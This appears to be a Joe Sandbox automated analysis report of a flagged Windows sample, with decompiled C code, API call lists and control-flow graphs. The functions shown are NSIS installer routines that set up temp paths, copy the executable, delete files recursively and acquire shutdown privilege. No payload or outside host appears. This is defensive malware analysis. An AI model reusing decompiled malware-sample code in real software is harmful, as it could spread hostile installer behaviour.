                                                                            0x00000000
                                                                            0x00403932
                                                                            0x004038b0
                                                                            0x004038c8
                                                                            0x004038d9
                                                                            0x004038da
                                                                            0x004038de
                                                                            0x004038e0
                                                                            0x004038ee
                                                                            0x004038f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004038f5
                                                                            0x004038f7
                                                                            0x00000000
                                                                            0x004038f7
                                                                            0x0040381a
                                                                            0x00403826
                                                                            0x0040382b
                                                                            0x00403830
                                                                            0x00403832
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040383a
                                                                            0x00403842
                                                                            0x00403853
                                                                            0x0040385b
                                                                            0x0040385d
                                                                            0x00403862
                                                                            0x00403864
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403864
                                                                            0x00000000
                                                                            0x004037c1
                                                                            0x0040376a
                                                                            0x0040376c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040376e
                                                                            0x00403772
                                                                            0x00403776
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x00000000
                                                                            0x0040377d
                                                                            0x00403778
                                                                            0x0040377b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040377b
                                                                            0x00403714
                                                                            0x00403718
                                                                            0x0040371b
                                                                            0x00403722
                                                                            0x00403722
                                                                            0x00000000
                                                                            0x00403722
                                                                            0x0040371d
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x004036ee
                                                                            0x004036ef
                                                                            0x004036f0
                                                                            0x004036f0
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x00000000

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                            • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                            • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" ,00000000), ref: 004036D6
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                              • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" ,00000000,?), ref: 0040397C
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,0042AA28,00000001), ref: 00403A0E
                                                                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                            • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                            • ExitProcess.KERNEL32 ref: 00403A78
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                            • ExitProcess.KERNEL32 ref: 00403B0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 3859024572-2679640457
                                                                            • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                            • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                            • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                            • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 147->148 149 4058e4-4058ee 148->149 150 4058c8-4058ce 148->150 154 4058f0-4058f6 149->154 155 405944-405948 149->155 152 4058d0-4058df ShowWindow * 2 call 4044ce 150->152 153 405909-405912 call 404500 150->153 152->149 167 405917-40591b 153->167 159 4058f8-405904 call 404472 154->159 160 40591e-40592e ShowWindow 154->160 155->153 157 40594a-405950 155->157 157->153 165 405952-405965 SendMessageW 157->165 159->153 168 405930-405939 call 40559f 160->168 169 40593e-40593f call 404472 160->169 170 4057f7-40580e call 404499 163->170 171 4057e9-4057f5 SendMessageW 163->171 164->163 172 405a67-405a69 165->172 173 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->173 168->169 169->155 182 405810-405824 ShowWindow 170->182 183 405844-405865 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405998-4059a8 GetWindowRect 173->180 181 4059ab-4059c0 TrackPopupMenu 173->181 180->181 181->172 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->172 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->172 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                            C-Code - Quality: 95%
                                                                            			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                            				struct HWND__* _v8;
                                                                            				long _v12;
                                                                            				struct tagRECT _v28;
                                                                            				void* _v36;
                                                                            				signed int _v40;
                                                                            				int _v44;
                                                                            				int _v48;
                                                                            				signed int _v52;
                                                                            				int _v56;
                                                                            				void* _v60;
                                                                            				void* _v68;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				struct HWND__* _t94;
                                                                            				long _t95;
                                                                            				int _t100;
                                                                            				void* _t108;
                                                                            				intOrPtr _t119;
                                                                            				void* _t127;
                                                                            				intOrPtr _t130;
                                                                            				struct HWND__* _t134;
                                                                            				int _t156;
                                                                            				int _t159;
                                                                            				struct HMENU__* _t164;
                                                                            				struct HWND__* _t168;
                                                                            				struct HWND__* _t169;
                                                                            				int _t171;
                                                                            				void* _t172;
                                                                            				short* _t173;
                                                                            				short* _t175;
                                                                            				int _t177;
                                                                            
                                                                            				_t169 =  *0x433ee4;
                                                                            				_t156 = 0;
                                                                            				_v8 = _t169;
                                                                            				if(_a8 != 0x110) {
                                                                            					if(_a8 == 0x405) {
                                                                            						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                            						CloseHandle(_t127); // executed
                                                                            					}
                                                                            					if(_a8 != 0x111) {
                                                                            						L17:
                                                                            						_t171 = 1;
                                                                            						if(_a8 != 0x404) {
                                                                            							L25:
                                                                            							if(_a8 != 0x7b) {
                                                                            								goto L20;
                                                                            							}
                                                                            							_t94 = _v8;
                                                                            							if(_a12 != _t94) {
                                                                            								goto L20;
                                                                            							}
                                                                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                            							_a8 = _t95;
                                                                            							if(_t95 <= _t156) {
                                                                            								L36:
                                                                            								return 0;
                                                                            							}
                                                                            							_t164 = CreatePopupMenu();
                                                                            							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                            							_t100 = _a16;
                                                                            							_t159 = _a16 >> 0x10;
                                                                            							if(_a16 == 0xffffffff) {
                                                                            								GetWindowRect(_v8,  &_v28);
                                                                            								_t100 = _v28.left;
                                                                            								_t159 = _v28.top;
                                                                            							}
                                                                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                            								_v60 = _t156;
                                                                            								_v48 = 0x42d268;
                                                                            								_v44 = 0x1000;
                                                                            								_a4 = _a8;
                                                                            								do {
                                                                            									_a4 = _a4 - 1;
                                                                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                            								} while (_a4 != _t156);
                                                                            								OpenClipboard(_t156);
                                                                            								EmptyClipboard();
                                                                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                            								_a4 = _t108;
                                                                            								_t172 = GlobalLock(_t108);
                                                                            								do {
                                                                            									_v48 = _t172;
                                                                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                            									 *_t173 = 0xd;
                                                                            									_t175 = _t173 + 2;
                                                                            									 *_t175 = 0xa;
                                                                            									_t172 = _t175 + 2;
                                                                            									_t156 = _t156 + 1;
                                                                            								} while (_t156 < _a8);
                                                                            								GlobalUnlock(_a4);
                                                                            								SetClipboardData(0xd, _a4);
                                                                            								CloseClipboard();
                                                                            							}
                                                                            							goto L36;
                                                                            						}
                                                                            						if( *0x433ecc == _t156) {
                                                                            							ShowWindow( *0x434f08, 8);
                                                                            							if( *0x434f8c == _t156) {
                                                                            								_t119 =  *0x42c240; // 0x72cc24
                                                                            								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                                            							}
                                                                            							E00404472(_t171);
                                                                            							goto L25;
                                                                            						}
                                                                            						 *0x42ba38 = 2;
                                                                            						E00404472(0x78);
                                                                            						goto L20;
                                                                            					} else {
                                                                            						if(_a12 != 0x403) {
                                                                            							L20:
                                                                            							return E00404500(_a8, _a12, _a16);
                                                                            						}
                                                                            						ShowWindow( *0x433ed0, _t156);
                                                                            						ShowWindow(_t169, 8);
                                                                            						E004044CE(_t169);
                                                                            						goto L17;
                                                                            					}
                                                                            				}
                                                                            				_v52 = _v52 | 0xffffffff;
                                                                            				_v40 = _v40 | 0xffffffff;
                                                                            				_t177 = 2;
                                                                            				_v60 = _t177;
                                                                            				_v56 = 0;
                                                                            				_v48 = 0;
                                                                            				_v44 = 0;
                                                                            				asm("stosd");
                                                                            				asm("stosd");
                                                                            				_t130 =  *0x434f10;
                                                                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                            				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                            				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                            				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                            				 *0x433ee4 = _t134;
                                                                            				_v8 = _t134;
                                                                            				E004044CE( *0x433ed0);
                                                                            				 *0x433ed4 = E00404E27(4);
                                                                            				 *0x433eec = 0;
                                                                            				GetClientRect(_v8,  &_v28);
                                                                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                            				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                            				if(_a8 >= 0) {
                                                                            					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                            					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                            				}
                                                                            				if(_a12 >= _t156) {
                                                                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                            				_push(0x1b);
                                                                            				E00404499(_a4);
                                                                            				if(( *0x434f18 & 0x00000003) != 0) {
                                                                            					ShowWindow( *0x433ed0, _t156);
                                                                            					if(( *0x434f18 & 0x00000002) != 0) {
                                                                            						 *0x433ed0 = _t156;
                                                                            					} else {
                                                                            						ShowWindow(_v8, 8);
                                                                            					}
                                                                            					E004044CE( *0x433ec8);
                                                                            				}
                                                                            				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                            				if(( *0x434f18 & 0x00000004) != 0) {
                                                                            					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                            				}
                                                                            				goto L36;
                                                                            			}




































                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                            • GetClientRect.USER32(?,?), ref: 00405788
                                                                            • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                            • ShowWindow.USER32(00000000), ref: 004058D7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                            • ShowWindow.USER32(00000008), ref: 00405926
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                            • CreatePopupMenu.USER32 ref: 0040596B
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                            • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                            • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                            • EmptyClipboard.USER32 ref: 00405A06
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                            • CloseClipboard.USER32 ref: 00405A61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                            • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 455 405cc1-405cc2 call 405e58 449->455 456 405cb4-405cbf lstrcatW 449->456 450->447 454 405dba-405dbd 450->454 451->449 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 459 405cc7-405ccb 455->459 456->459 457->447 465 405dd1-405de5 call 405e0c call 405c01 457->465 458->447 462 405cd7-405cdd lstrcatW 459->462 463 405ccd-405cd5 459->463 466 405ce2-405cfe lstrlenW FindFirstFileW 462->466 463->462 463->466 482 405de7-405dea 465->482 483 405dfd-405e00 call 40559f 465->483 468 405d04-405d0c 466->468 469 405da8-405dac 466->469 470 405d2c-405d40 call 40653d 468->470 471 405d0e-405d16 468->471 469->450 473 405dae 469->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->468 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->469 482->458 486 405dec-405dfb call 40559f call 4062fd 482->486 483->447 484->475 487 405d4c-405d55 call 405c49 484->487 495 405d83-405d86 call 40559f 485->495 496 405d64-405d67 485->496 486->447 487->475 495->475 499 405d69-405d79 call 40559f call 4062fd 496->499 500 405d7b-405d81 496->500 499->475 500->475
                                                                            C-Code - Quality: 98%
                                                                            			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				short _v556;
                                                                            				short _v558;
                                                                            				struct _WIN32_FIND_DATAW _v604;
                                                                            				signed int _t38;
                                                                            				signed int _t52;
                                                                            				signed int _t55;
                                                                            				signed int _t62;
                                                                            				void* _t64;
                                                                            				signed char _t65;
                                                                            				WCHAR* _t66;
                                                                            				void* _t67;
                                                                            				WCHAR* _t68;
                                                                            				void* _t70;
                                                                            
                                                                            				_t65 = _a8;
                                                                            				_t68 = _a4;
                                                                            				_v8 = _t65 & 0x00000004;
                                                                            				_t38 = E00405F14(__eflags, _t68);
                                                                            				_v12 = _t38;
                                                                            				if((_t65 & 0x00000008) != 0) {
                                                                            					_t62 = DeleteFileW(_t68); // executed
                                                                            					asm("sbb eax, eax");
                                                                            					_t64 =  ~_t62 + 1;
                                                                            					 *0x434f88 =  *0x434f88 + _t64;
                                                                            					return _t64;
                                                                            				}
                                                                            				_a4 = _t65;
                                                                            				_t8 =  &_a4;
                                                                            				 *_t8 = _a4 & 0x00000001;
                                                                            				__eflags =  *_t8;
                                                                            				if( *_t8 == 0) {
                                                                            					L5:
                                                                            					E0040653D(0x42f270, _t68);
                                                                            					__eflags = _a4;
                                                                            					if(_a4 == 0) {
                                                                            						E00405E58(_t68);
                                                                            					} else {
                                                                            						lstrcatW(0x42f270, L"\\*.*");
                                                                            					}
                                                                            					__eflags =  *_t68;
                                                                            					if( *_t68 != 0) {
                                                                            						L10:
                                                                            						lstrcatW(_t68, 0x40a014);
                                                                            						L11:
                                                                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                            						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
                                                                            						_t70 = _t38;
                                                                            						__eflags = _t70 - 0xffffffff;
                                                                            						if(_t70 == 0xffffffff) {
                                                                            							L26:
                                                                            							__eflags = _a4;
                                                                            							if(_a4 != 0) {
                                                                            								_t30 = _t66 - 2;
                                                                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                            								__eflags =  *_t30;
                                                                            							}
                                                                            							goto L28;
                                                                            						} else {
                                                                            							goto L12;
                                                                            						}
                                                                            						do {
                                                                            							L12:
                                                                            							__eflags = _v604.cFileName - 0x2e;
                                                                            							if(_v604.cFileName != 0x2e) {
                                                                            								L16:
                                                                            								E0040653D(_t66,  &(_v604.cFileName));
                                                                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                            								if(__eflags == 0) {
                                                                            									_t52 = E00405C01(__eflags, _t68, _v8);
                                                                            									__eflags = _t52;
                                                                            									if(_t52 != 0) {
                                                                            										E0040559F(0xfffffff2, _t68);
                                                                            									} else {
                                                                            										__eflags = _v8 - _t52;
                                                                            										if(_v8 == _t52) {
                                                                            											 *0x434f88 =  *0x434f88 + 1;
                                                                            										} else {
                                                                            											E0040559F(0xfffffff1, _t68);
                                                                            											E004062FD(_t67, _t68, 0);
                                                                            										}
                                                                            									}
                                                                            								} else {
                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                            									if(__eflags == 0) {
                                                                            										E00405C49(__eflags, _t68, _a8);
                                                                            									}
                                                                            								}
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _v558;
                                                                            							if(_v558 == 0) {
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _v558 - 0x2e;
                                                                            							if(_v558 != 0x2e) {
                                                                            								goto L16;
                                                                            							}
                                                                            							__eflags = _v556;
                                                                            							if(_v556 == 0) {
                                                                            								goto L24;
                                                                            							}
                                                                            							goto L16;
                                                                            							L24:
                                                                            							_t55 = FindNextFileW(_t70,  &_v604);
                                                                            							__eflags = _t55;
                                                                            						} while (_t55 != 0);
                                                                            						_t38 = FindClose(_t70);
                                                                            						goto L26;
                                                                            					}
                                                                            					__eflags =  *0x42f270 - 0x5c;
                                                                            					if( *0x42f270 != 0x5c) {
                                                                            						goto L11;
                                                                            					}
                                                                            					goto L10;
                                                                            				} else {
                                                                            					__eflags = _t38;
                                                                            					if(_t38 == 0) {
                                                                            						L28:
                                                                            						__eflags = _a4;
                                                                            						if(_a4 == 0) {
                                                                            							L36:
                                                                            							return _t38;
                                                                            						}
                                                                            						__eflags = _v12;
                                                                            						if(_v12 != 0) {
                                                                            							_t38 = E00406873(_t68);
                                                                            							__eflags = _t38;
                                                                            							if(_t38 == 0) {
                                                                            								goto L36;
                                                                            							}
                                                                            							E00405E0C(_t68);
                                                                            							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                                            							__eflags = _t38;
                                                                            							if(_t38 != 0) {
                                                                            								return E0040559F(0xffffffe5, _t68);
                                                                            							}
                                                                            							__eflags = _v8;
                                                                            							if(_v8 == 0) {
                                                                            								goto L30;
                                                                            							}
                                                                            							E0040559F(0xfffffff1, _t68);
                                                                            							return E004062FD(_t67, _t68, 0);
                                                                            						}
                                                                            						L30:
                                                                            						 *0x434f88 =  *0x434f88 + 1;
                                                                            						return _t38;
                                                                            					}
                                                                            					__eflags = _t65 & 0x00000002;
                                                                            					if((_t65 & 0x00000002) == 0) {
                                                                            						goto L28;
                                                                            					}
                                                                            					goto L5;
                                                                            				}
                                                                            			}


















                                                                            0x00000000
                                                                            0x00405dbf
                                                                            0x00405c99
                                                                            0x00405c9c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c9c

                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                            • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                            • FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
